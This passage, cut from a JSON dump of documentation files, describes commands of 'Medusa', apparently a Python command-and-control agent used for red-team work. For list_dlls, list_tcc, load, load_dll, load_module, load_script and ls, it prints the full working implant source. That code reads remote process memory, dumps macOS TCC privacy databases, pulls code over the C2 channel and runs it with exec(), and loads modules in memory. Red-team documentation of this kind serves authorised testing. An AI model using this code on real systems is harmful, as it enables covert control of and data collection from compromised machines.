    "content": "+++\ntitle = \"list_dlls\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis uses the ctypes library to interface with Windows API to read the local or a remote process's PEB and list the loaded DLLs.\n\n- Python Versions Supported: 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nlist_dlls [process_id]\n```\n\n## MITRE ATT&CK Mapping\n\n- T1057  \n\n## Detailed Summary\nThis function takes an optional PID. If none is given, it will list DLLs loaded in the current process.\n\n```Python\n    def list_dlls(self, task_id, process_id=0):\n        import sys, os.path, ctypes, ctypes.wintypes\n        from ctypes import create_unicode_buffer, GetLastError\n        import re\n        import datetime\n\n        def _check_bool(result, func, args):\n            if not result:\n                raise ctypes.WinError(ctypes.get_last_error())\n            return args\n\n        PULONG = ctypes.POINTER(ctypes.wintypes.ULONG)\n        ULONG_PTR = ctypes.wintypes.LPVOID\n        SIZE_T = ctypes.c_size_t\n        NTSTATUS = ctypes.wintypes.LONG\n        PVOID = ctypes.wintypes.LPVOID\n        PROCESSINFOCLASS = ctypes.wintypes.ULONG\n\n        Kernel32 = ctypes.WinDLL('kernel32.dll')\n        OpenProcess = Kernel32.OpenProcess\n        OpenProcess.restype = ctypes.wintypes.HANDLE\n        CloseHandle = Kernel32.CloseHandle\n        CloseHandle.errcheck = _check_bool\n\n        GetCurrentProcess = Kernel32.GetCurrentProcess\n        GetCurrentProcess.restype = ctypes.wintypes.HANDLE\n        GetCurrentProcess.argtypes = ()\n\n        ReadProcessMemory = Kernel32.ReadProcessMemory\n        ReadProcessMemory.errcheck = _check_bool\n        ReadProcessMemory.argtypes = (\n            ctypes.wintypes.HANDLE,\n            ctypes.wintypes.LPCVOID,\n            ctypes.wintypes.LPVOID, \n            SIZE_T,\n            ctypes.POINTER(SIZE_T)) \n\n        # WINAPI Definitions\n        PROCESS_VM_READ           = 
0x0010\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        ERROR_INVALID_HANDLE = 0x0006\n        ERROR_PARTIAL_COPY   = 0x012B\n\n        WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7\n\n        MAX_PATH = 260\n        PROCESS_TERMINATE = 0x0001\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        ProcessBasicInformation   = 0\n        ProcessDebugPort          = 7\n        ProcessWow64Information   = 26\n        ProcessImageFileName      = 27\n        ProcessBreakOnTermination = 29\n\n        STATUS_UNSUCCESSFUL         = NTSTATUS(0xC0000001)\n        STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value\n        STATUS_INVALID_HANDLE       = NTSTATUS(0xC0000008).value\n        STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value\n\n\n        class RemotePointer(ctypes._Pointer):\n            def __getitem__(self, key):\n                # TODO: slicing\n                size = None\n                if not isinstance(key, tuple):\n                    raise KeyError('must be (index, handle[, size])')\n                if len(key) > 2:\n                    index, handle, size = key\n                else:\n                    index, handle = key\n                if isinstance(index, slice):\n                    raise TypeError('slicing is not supported')\n                dtype = self._type_\n                offset = ctypes.sizeof(dtype) * index\n                address = PVOID.from_buffer(self).value + offset\n                simple = issubclass(dtype, ctypes._SimpleCData)\n                if simple and size is not None:\n                    if dtype._type_ == ctypes.wintypes.WCHAR._type_:\n                        buf = (ctypes.wintypes.WCHAR * (size // 2))()\n                    else:\n                        buf = (ctypes.c_char * size)()\n                else:\n                    buf = dtype()\n                nread = SIZE_T()\n                Kernel32.ReadProcessMemory(handle,\n                                        address,\n                             
           ctypes.byref(buf),\n                                        ctypes.sizeof(buf),\n                                        ctypes.byref(nread))\n                if simple:\n                    return buf.value\n                return buf\n\n        _remote_pointer_cache = {}\n        def RPOINTER(dtype):\n            if dtype in _remote_pointer_cache:\n                return _remote_pointer_cache[dtype]\n            name = 'RP_%s' % dtype.__name__\n            ptype = type(name, (RemotePointer,), {'_type_': dtype})\n            _remote_pointer_cache[dtype] = ptype\n            return ptype\n\n\n        RPWSTR = RPOINTER(ctypes.wintypes.WCHAR)\n\n        class UNICODE_STRING(ctypes.Structure):\n            _fields_ = (('Length',        ctypes.wintypes.USHORT),\n                        ('MaximumLength', ctypes.wintypes.USHORT),\n                        ('Buffer',        RPWSTR))\n\n        class LIST_ENTRY(ctypes.Structure):\n            pass\n\n        RPLIST_ENTRY = RPOINTER(LIST_ENTRY)\n\n        LIST_ENTRY._fields_ = (('Flink', RPLIST_ENTRY),\n                            ('Blink', RPLIST_ENTRY))\n\n        class LDR_DATA_TABLE_ENTRY(ctypes.Structure):\n            _fields_ = (('Reserved1',          PVOID * 2),\n                        ('InMemoryOrderLinks', LIST_ENTRY),\n                        ('Reserved2',          PVOID * 2),\n                        ('DllBase',            PVOID),\n                        ('EntryPoint',         PVOID),\n                        ('Reserved3',          PVOID),\n                        ('FullDllName',        UNICODE_STRING),\n                        ('Reserved4',          ctypes.wintypes.BYTE * 8),\n                        ('Reserved5',          PVOID * 3),\n                        ('CheckSum',           PVOID),\n                        ('TimeDateStamp',      ctypes.wintypes.ULONG))\n\n        RPLDR_DATA_TABLE_ENTRY = RPOINTER(LDR_DATA_TABLE_ENTRY)\n\n        class PEB_LDR_DATA(ctypes.Structure):\n            _fields_ = 
(('Reserved1',               ctypes.wintypes.BYTE * 8),\n                        ('Reserved2',               PVOID * 3),\n                        ('InMemoryOrderModuleList', LIST_ENTRY))\n\n        RPPEB_LDR_DATA = RPOINTER(PEB_LDR_DATA)\n\n        class RTL_USER_PROCESS_PARAMETERS(ctypes.Structure):\n            _fields_ = (('Reserved1',     ctypes.wintypes.BYTE * 16),\n                        ('Reserved2',     PVOID * 10),\n                        ('ImagePathName', UNICODE_STRING),\n                        ('CommandLine',   UNICODE_STRING))\n\n        RPRTL_USER_PROCESS_PARAMETERS = RPOINTER(RTL_USER_PROCESS_PARAMETERS)\n        PPS_POST_PROCESS_INIT_ROUTINE = PVOID\n\n        class PEB(ctypes.Structure):\n            _fields_ = (('Reserved1',              ctypes.wintypes.BYTE * 2),\n                        ('BeingDebugged',          ctypes.wintypes.BYTE),\n                        ('Reserved2',              ctypes.wintypes.BYTE * 1),\n                        ('Reserved3',              PVOID * 2),\n                        ('Ldr',                    RPPEB_LDR_DATA),\n                        ('ProcessParameters',      RPRTL_USER_PROCESS_PARAMETERS),\n                        ('Reserved4',              ctypes.wintypes.BYTE * 104),\n                        ('Reserved5',              PVOID * 52),\n                        ('PostProcessInitRoutine', PPS_POST_PROCESS_INIT_ROUTINE),\n                        ('Reserved6',              ctypes.wintypes.BYTE * 128),\n                        ('Reserved7',              PVOID * 1),\n                        ('SessionId',              ctypes.wintypes.ULONG))\n\n        RPPEB = RPOINTER(PEB)\n\n        class PROCESS_BASIC_INFORMATION(ctypes.Structure):\n            _fields_ = (('Reserved1',       PVOID),\n                        ('PebBaseAddress',  RPPEB),\n                        ('Reserved2',       PVOID * 2),\n                        ('UniqueProcessId', ULONG_PTR),\n                        ('InheritedFromUniqueProcessId',       
ULONG_PTR))\n\n        def NtError(status):\n            import sys\n            descr = 'NTSTATUS(%#08x) ' % (status % 2**32,)\n            if status & 0xC0000000 == 0xC0000000:\n                descr += '[Error]'\n            elif status & 0x80000000 == 0x80000000:\n                descr += '[Warning]'\n            elif status & 0x40000000 == 0x40000000:\n                descr += '[Information]'\n            else:\n                descr += '[Success]'\n            if sys.version_info[:2] < (3, 3):\n                return WindowsError(status, descr)\n            return OSError(None, descr, None, status)\n\n        ntdll = ctypes.WinDLL('ntdll.dll')\n        NtQueryInformationProcess = ntdll.NtQueryInformationProcess\n        NtQueryInformationProcess.restype = NTSTATUS\n        NtQueryInformationProcess.argtypes = (\n            ctypes.wintypes.HANDLE,\n            PROCESSINFOCLASS, \n            PVOID,            \n            ctypes.wintypes.ULONG, \n            PULONG)           \n\n        class ProcessInformation(object):\n            _close_handle = False\n            _closed = False\n            _module_names = None\n\n            def __init__(self, process_id=None, handle=None):\n                if process_id is None and handle is None:\n                    handle = GetCurrentProcess()\n                elif handle is None:\n                    handle = OpenProcess(PROCESS_VM_READ | \n                                            PROCESS_QUERY_INFORMATION,\n                                                False, process_id)\n                    self._close_handle = True\n                self._handle = handle\n                self._query_info()\n                if process_id is not None and not self._ldr:\n                    return\n\n            def __del__(self, CloseHandle=CloseHandle):\n                if self._close_handle and not self._closed:\n                    try:\n                        CloseHandle(self._handle)\n                    except 
WindowsError as e:\n                        pass\n                    self._closed = True\n\n            def _query_info(self):\n                info = PROCESS_BASIC_INFORMATION()\n                handle = self._handle\n                status = NtQueryInformationProcess(handle,\n                                                ProcessBasicInformation,\n                                                ctypes.byref(info),\n                                                ctypes.sizeof(info),\n                                                None)\n                if status < 0:\n                    raise NtError(status)\n\n                self._peb = peb = info.PebBaseAddress[0, handle]\n                self._ldr = peb.Ldr[0, handle]\n\n            def _modules_iter(self):\n                headaddr = (PVOID.from_buffer(self._peb.Ldr).value +\n                            PEB_LDR_DATA.InMemoryOrderModuleList.offset)\n                offset = LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.offset\n                pentry = self._ldr.InMemoryOrderModuleList.Flink\n                while pentry:\n                    pentry_void = PVOID.from_buffer_copy(pentry)\n                    if pentry_void.value == headaddr:\n                        break\n                    pentry_void.value -= offset\n                    pmod = RPLDR_DATA_TABLE_ENTRY.from_buffer(pentry_void)\n                    mod = pmod[0, self._handle]\n                    yield mod\n                    pentry = LIST_ENTRY.from_buffer(mod, offset).Flink\n\n            def update_module_names(self):\n                names = []\n                for m in self._modules_iter():\n                    ustr = m.FullDllName\n                    name = ustr.Buffer[0, self._handle, ustr.Length]\n                    names.append(name)\n                self._module_names = names\n\n            @property\n            def module_names(self):\n                if self._module_names is None:\n                    self.update_module_names()\n  
              return self._module_names\n\n        try:\n            if not process_id:\n                pi = ProcessInformation()\n            else:\n                pi = ProcessInformation(process_id)\n            return { \"dlls\": pi.module_names }\n        except Exception as e:\n            return e\n```\n\nThis output is turned into a sortable table via a browserscript."
  },
  {
    "path": "documentation-payload/medusa/commands/list_modules.md",
    "content": "+++\ntitle = \"list_modules\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nLists the modules (Python libraries) that have been loaded into the Medusa agent.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### module_name\n\n- Description: specific module to output a full file listing for\n- Required Value: False  \n- Default Value: \"\"  \n\n\n## Usage\n\n```\nlist_modules [module_name]\n```\n\n## Detailed Summary\n\nThis function will list the name of the modules that have been loaded into memory, and can provide a detailed file listing if a module name is passed to it:\n\n```Python\n    def list_modules(self, task_id, module_name=\"\"):\n        if module_name:\n            if module_name in self.moduleRepo.keys():\n                return \"\\n\".join(self.moduleRepo[module_name].namelist())\n            else: return \"{} not found in loaded modules\".format(module_name)\n        else:\n            return \"\\n\".join(self.moduleRepo.keys())\n\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/list_tcc.md",
    "content": "+++\ntitle = \"list_tcc\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis uses the Python `sqlite` library to query TCC databases and return the contents.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nlist_tcc\n```\n\n## Detailed Summary\nWith the relevant access, Medusa uses the `sqlite` library to query the contents of either the Root or user-specific TCC databases. This is then formatted by a browser script in the UI.\n\n```Python\n    def list_tcc(self,task_id,tcc=True, db=\"/Library/Application Support/com.apple.TCC/TCC.db\"):\n        import sqlite3\n\n        with sqlite3.connect(db) as con:\n            columns = []\n            for row in con.execute('PRAGMA table_info(\"access\")'):\n                columns.append(row)\n\n            tcc = []\n            for row in con.execute('SELECT * FROM \"access\"'):\n                tcc.append(row)\n            results = []\n            for entry in tcc:\n                line={}\n                count = 0 \n                for ent in entry:\n                    if columns[count][2] == \"BLOB\" and ent != None:\n                        line[columns[count][1]] = base64.b64encode(ent).decode()\n                    else: line[columns[count][1]] = str(ent)\n                    count+=1\n                results.append(line)\n\n            tcc_results = {}\n            tcc_results[\"entries\"] = results\n            return { \"tcc\": results }\n\n```"
  },
  {
    "path": "documentation-payload/medusa/commands/load.md",
    "content": "+++\ntitle = \"load\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis loads new functions into memory via the C2 channel \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### cmd_to_load\n\n- Description: name of existing Medusa command to load (e.g. shell)\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nload cmd\n```\n\n## MITRE ATT&CK Mapping\n\n- T1030  \n- T1129 \n\n## Detailed Summary\nThe associated command's python files (selecting the correct Python version where necessary) is base64 encoded, and sent down to the agent to be loaded in. \n\n```Python\n    def load(self, task_id, file_id, command):\n        total_chunks = 1\n        chunk_num = 0\n        cmd_code = \"\"\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file_id, \"chunk_num\": chunk_num }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            chunk_num+=1\n            total_chunks = chunk[\"total_chunks\"]\n            cmd_code += base64.b64decode(chunk[\"chunk_data\"]).decode()\n\n        if cmd_code:\n            exec(cmd_code.replace(\"\\n    \",\"\\n\")[4:])\n            setattr(medusa, command, eval(command))\n            cmd_list = [{\"action\": \"add\", \"cmd\": command}]\n            responses = [{ \"task_id\": task_id, \"user_output\": \"Loaded command: {}\".format(command), \"commands\": cmd_list, \"completed\": True }]\n            message = { \"action\": \"post_response\", \"responses\": responses }\n            response_data = 
 self.postMessageAndRetrieveResponse(message)\n        else: return \"Failed to upload '{}' command\".format(command)\n```\n\nNotably, this implementation supports chunking for this function to facilitate large functions being loaded."
  },
  {
    "path": "documentation-payload/medusa/commands/load_dll.md",
    "content": "+++\ntitle = \"load_dll\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nUses Python's `ctypes` library to load a DLL on disk and execute it with a given export function.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### path\n\n- Description: path to DLL on target file system\n- Required Value: True  \n- Default Value: None  \n\n#### export\n\n- Description: exported function to execute\n- Required Value: True  \n- Default Value: None  \n\n\n## Usage\n\n```\nload_dll path/to/dll function_exported\n```\n\n## Detailed Summary\n\nUses the `ctypes` library to execute a DLL with its supported function. This expects a DLL that returns an int value and doesn't exit the process upon completion (because that'll kill the agent too!):\n\n```Python\n    def load_dll(self, task_id, dllpath, dllexport):\n        from ctypes import WinDLL\n        dll_file_path = dllpath if dllpath[0] == os.sep \\\n                else os.path.join(self.current_directory,dllpath)\n        loaded_dll = WinDLL(dll_file_path)\n        eval(\"{}.{}()\".format(\"loaded_dll\",dllexport))\n        return \"[*] {} Loaded.\".format(dllpath)\n\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/load_module.md",
    "content": "+++\ntitle = \"load_module\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nLoads a zipped Python module into memory for reference in custom scripts.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### file\n\n- Description: a local zip file containing the directory for a python module\n- Required Value: True  \n- Default Value: None  \n\n#### module_name\n\n- Description: the name of the module being loaded, e.g. 'dns'\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nload_module\n```\n\n## Detailed Summary\n\nThis function instantiates a new custom finder and adds it to `meta_path`. When an import is used in subsequent scripts, the `meta_path` will use this custom finder to load the module directly from memory, rather than from on-disk standard locations:\n\nPython 2.7\n```Python\n    def load_module(self, task_id, file, module_name):\n        import zipfile, io\n        class CFinder(object):\n            def __init__(self, repoName, instance):\n                self.moduleRepo = instance.moduleRepo\n                self.repoName = repoName\n                self._source_cache = {}\n\n            def _get_info(self, repoName, fullname):\n                parts = fullname.split('.')\n                submodule = parts[-1]\n                modulepath = '/'.join(parts)\n                _search_order = [('.py', False), ('/__init__.py', True)]\n                for suffix, is_package in _search_order:\n                    relpath = modulepath + suffix\n                    try: self.moduleRepo[repoName].getinfo(relpath)\n                    except KeyError: pass\n                    else: return submodule, is_package, relpath\n                msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))\n                raise ImportError(msg)\n\n            def _get_source(self, repoName, fullname):\n                submodule, 
is_package, relpath = self._get_info(repoName, fullname)\n                fullpath = '%s/%s' % (repoName, relpath)\n                if relpath in self._source_cache:\n                    source = self._source_cache[relpath]\n                    return submodule, is_package, fullpath, source\n                try:\n                    source =  self.moduleRepo[repoName].read(relpath)\n                    source = source.replace(b'\\r\\n', b'\\n')\n                    source = source.replace(b'\\r', b'\\n')\n                    self._source_cache[relpath] = source\n                    return submodule, is_package, fullpath, source\n                except: raise ImportError(\"Unable to obtain source for module %s\" % (fullpath))\n\n            def find_module(self, fullname, path=None):\n                try: submodule, is_package, relpath = self._get_info(self.repoName, fullname)\n                except ImportError: return None\n                else: return self\n\n            def load_module(self, fullname):\n                import imp\n                submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)\n                code = compile(source, fullpath, 'exec')\n                mod = sys.modules.setdefault(fullname, imp.new_module(fullname))\n                mod.__loader__ = self\n                mod.__file__ = fullpath\n                mod.__name__ = fullname\n                if is_package: mod.__path__ = [os.path.dirname(mod.__file__)]\n                exec code in mod.__dict__\n                return mod\n\n            def get_data(self, fullpath):\n                prefix = os.path.join(self.repoName, '')\n                if not fullpath.startswith(prefix):\n                    raise IOError('Path %r does not start with module name %r', (fullpath, prefix))\n                relpath = fullpath[len(prefix):]\n                try: return self.moduleRepo[self.repoName].read(relpath)\n                except KeyError: raise IOError('Path %r 
not found in repo %r' % (relpath, self.repoName))\n\n            def is_package(self, fullname):\n                \"\"\"Return if the module is a package\"\"\"\n                submodule, is_package, relpath = self._get_info(self.repoName, fullname)\n                return is_package\n\n            def get_code(self, fullname):\n                submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)\n                return compile(source, fullpath, 'exec')\n\n        if module_name in self.moduleRepo.keys(): return \"{} module already loaded.\".format(module_name)\n        total_chunks = 1\n        chunk_num = 0\n        module_zip = bytearray()\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file, \"chunk_num\": chunk_num+1 }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            total_chunks = chunk[\"total_chunks\"]\n            chunk_num+=1\n            module_zip.extend(base64.b64decode(chunk[\"chunk_data\"]))\n\n        if module_zip:\n            self.moduleRepo[module_name] = zipfile.ZipFile(io.BytesIO(module_zip))\n            if module_name not in self._meta_cache:\n                finder = CFinder(module_name, self)\n                self._meta_cache[module_name] = finder\n                sys.meta_path.append(finder)        \n        else: return \"Failed to download in-memory module\"\n\n```\n\nPython 3.8:\n```Python\n    def load_module(self, task_id, file, module_name):\n        import zipfile, io\n\n        class CFinder(object):\n            def __init__(self, repoName, instance):\n                self.moduleRepo = 
instance.moduleRepo\n                self.repoName = repoName\n                self._source_cache = {}\n\n            def _get_info(self, repoName, fullname):\n                parts = fullname.split('.')\n                submodule = parts[-1]\n                modulepath = '/'.join(parts)\n                _search_order = [('.py', False), ('/__init__.py', True)]\n                for suffix, is_package in _search_order:\n                    relpath = modulepath + suffix\n                    try: self.moduleRepo[repoName].getinfo(relpath)\n                    except KeyError: pass\n                    else: return submodule, is_package, relpath\n                msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))\n                raise ImportError(msg)\n\n            def _get_source(self, repoName, fullname):\n                submodule, is_package, relpath = self._get_info(repoName, fullname)\n                fullpath = '%s/%s' % (repoName, relpath)\n                if relpath in self._source_cache:\n                    source = self._source_cache[relpath]\n                    return submodule, is_package, fullpath, source\n                try:\n                    source =  self.moduleRepo[repoName].read(relpath)\n                    source = source.replace(b'\\r\\n', b'\\n')\n                    source = source.replace(b'\\r', b'\\n')\n                    self._source_cache[relpath] = source\n                    return submodule, is_package, fullpath, source\n                except: raise ImportError(\"Unable to obtain source for module %s\" % (fullpath))\n\n            def find_module(self, fullname, path=None):\n                try: submodule, is_package, relpath = self._get_info(self.repoName, fullname)\n                except ImportError: return None\n                else: return self\n\n            def load_module(self, fullname):\n                import types\n                submodule, is_package, fullpath, source = 
self._get_source(self.repoName, fullname)\n                code = compile(source, fullpath, 'exec')\n                mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))\n                mod.__loader__ = self\n                mod.__file__ = fullpath\n                mod.__name__ = fullname\n                if is_package:\n                    mod.__path__ = [os.path.dirname(mod.__file__)]\n                exec(code, mod.__dict__)\n                return mod\n\n            def get_data(self, fullpath):\n\n                prefix = os.path.join(self.repoName, '')\n                if not fullpath.startswith(prefix):\n                    raise IOError('Path %r does not start with module name %r', (fullpath, prefix))\n                relpath = fullpath[len(prefix):]\n                try:\n                    return self.moduleRepo[self.repoName].read(relpath)\n                except KeyError:\n                    raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))\n\n            def is_package(self, fullname):\n                \"\"\"Return if the module is a package\"\"\"\n                submodule, is_package, relpath = self._get_info(self.repoName, fullname)\n                return is_package\n\n            def get_code(self, fullname):\n                submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)\n                return compile(source, fullpath, 'exec')\n\n        if module_name in self.moduleRepo.keys():\n            return \"{} module already loaded.\".format(module_name)\n        total_chunks = 1\n        chunk_num = 0\n        module_zip = bytearray()\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file, 
\"chunk_num\": chunk_num+1 }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            total_chunks = chunk[\"total_chunks\"]\n            chunk_num+=1\n            module_zip.extend(base64.b64decode(chunk[\"chunk_data\"]))\n\n        if module_zip:\n            self.moduleRepo[module_name] = zipfile.ZipFile(io.BytesIO(module_zip))\n            if module_name not in self._meta_cache:\n                finder = CFinder(module_name, self)\n                self._meta_cache[module_name] = finder\n                sys.meta_path.append(finder)        \n        else: return \"Failed to download in-memory module\"\n\n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/load_script.md",
    "content": "+++\ntitle = \"load_script\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis loads a new script into memory via the C2 channel. It can be used in combination with the `eval_code` function, and `setattr()` to dynamically add capability outside of Medusa's existing functions.  \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### file\n\n- Description: script file to load into agent\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nload_script\n```\n\n## Detailed Summary\n\nThe python script is downloaded and executed using the Python `exec()` function. Notably, this implementation implements chunking for this function to facilitate large scripts being loaded.\n\nDepending on the script content being interpreted, you can include functions that may be called later, using the `setattr()` function and Medusa's `eval_code` function.\n\nFirstly, the function itself:\n\n```Python\n    def load_script(self, task_id, file):\n        total_chunks = 1\n        chunk_num = 0\n        cmd_code = \"\"\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file, \"chunk_num\": chunk_num }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            chunk_num+=1\n            total_chunks = chunk[\"total_chunks\"]\n            cmd_code += base64.b64decode(chunk[\"chunk_data\"]).decode()\n            \n        if cmd_code: exec(cmd_code)\n        else: return \"Failed to load script\"\n\n```\n\nIf we pass a script like the one below to Medusa, it'll print `hello` 
immediately. Then, as we've registered our `hello_again` function, we can call it again with the Medusa command: `eval_code self.hello_again()`. This will then execute the second print statement, to display `hello again`. A very simple example, but hopefully one that articulates what's possible here.\n\n```\nprint(\"hello\")\n\ndef hello_again(self):\n    print(\"hello again\")\n\nsetattr(medusa, \"hello_again\", hello_again)\n```\n\n{{% notice warning %}}\n Script content must be compatible with the version of Python the agent is running with!\n{{% /notice %}}\n "
  },
  {
    "path": "documentation-payload/medusa/commands/ls.md",
    "content": "+++\ntitle = \"ls\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nGet attributes about a file and display it to the user via API calls. No need for quotes and relative paths are fine \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### path\n\n- Description: Path of file or folder on the current system to list   \n- Required Value: True  \n- Default Value: .  \n\n## Usage\n\n```\nls /path/to/file\n```\n\n## MITRE ATT&CK Mapping\n\n- T1106  \n- T1083  \n\n## Detailed Summary\nThis command used python `os` library functions to get the contents of directories and metadata of files. \n\nPython 2.7:\n```Python\n    def ls(self, task_id, path, file_browser=False):\n        if path == \".\": file_path = self.current_directory\n        else: file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n        file_details = os.stat(file_path)\n        target_is_file = os.path.isfile(file_path)\n        target_name = os.path.basename(file_path.rstrip(os.sep))\n        file_browser = {\n            \"host\": socket.gethostname(),\n            \"is_file\": target_is_file,\n            \"permissions\": {\"octal\": oct(file_details.st_mode)[-3:]},\n            \"name\": target_name if target_name != \".\" \\\n                    else os.path.basename(self.current_directory.rstrip(os.sep)),            \"parent_path\": os.path.abspath(os.path.join(file_path, os.pardir)),\n            \"success\": True,\n            \"access_time\": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_atime)),\n            \"modify_time\": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_mtime)),\n            \"size\": file_details.st_size,\n            \"update_deleted\": True,\n        }\n        files = []\n        if not target_is_file:\n            for entry in os.listdir(file_path):\n                
full_path = os.path.join(file_path, entry)\n                file = {}\n                file['name'] = entry \n                file['is_file'] = True if os.path.isfile(full_path) else False\n                try:\n                    file_details = os.stat(full_path)\n                    file[\"permissions\"] = { \"octal\": oct(file_details.st_mode)[-3:]}\n                    file[\"access_time\"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_atime))\n                    file[\"modify_time\"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_mtime))\n                    file[\"size\"] = file_details.st_size\n                except OSError as e:\n                    pass\n                files.append(file)\n        file_browser[\"files\"] = files\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"file_browser\"] = file_browser\n        return { \"files\": files }\n```\n\nPython 3.8\n\n```Python\n    def ls(self, task_id, path, file_browser=False):\n        if path == \".\": file_path = self.current_directory\n        else: file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n        file_details = os.stat(file_path)\n        target_is_file = os.path.isfile(file_path)\n        target_name = os.path.basename(file_path.rstrip(os.sep))\n        file_browser = {\n            \"host\": socket.gethostname(),\n            \"is_file\": target_is_file,\n            \"permissions\": {\"octal\": oct(file_details.st_mode)[-3:]},\n            \"name\": target_name if target_name != \".\" \\\n                    else os.path.basename(self.current_directory.rstrip(os.sep)),            \"parent_path\": os.path.abspath(os.path.join(file_path, os.pardir)),\n            \"success\": True,\n            \"access_time\": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_atime)),\n            \"modify_time\": time.strftime('%Y-%m-%d 
%H:%M:%S', time.localtime(file_details.st_mtime)),\n            \"size\": file_details.st_size,\n            \"update_deleted\": True,\n        }\n        files = []\n        if not target_is_file:\n            with os.scandir(file_path) as entries:\n                for entry in entries:\n                    file = {}\n                    file['name'] = entry.name\n                    file['is_file'] = True if entry.is_file() else False\n                    try:\n                        file_details = os.stat(os.path.join(file_path, entry.name))\n                        file[\"permissions\"] = { \"octal\": oct(file_details.st_mode)[-3:]}\n                        file[\"access_time\"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_atime))\n                        file[\"modify_time\"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_mtime))\n                        file[\"size\"] = file_details.st_size\n                    except OSError as e:\n                        pass\n                    files.append(file)  \n        file_browser[\"files\"] = files\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"file_browser\"] = file_browser\n        return { \"files\": files }\n\n```\n\nThis command helps populate the file browser, which is where all this data can be seen.\n"
  },
  {
    "path": "documentation-payload/medusa/commands/mv.md",
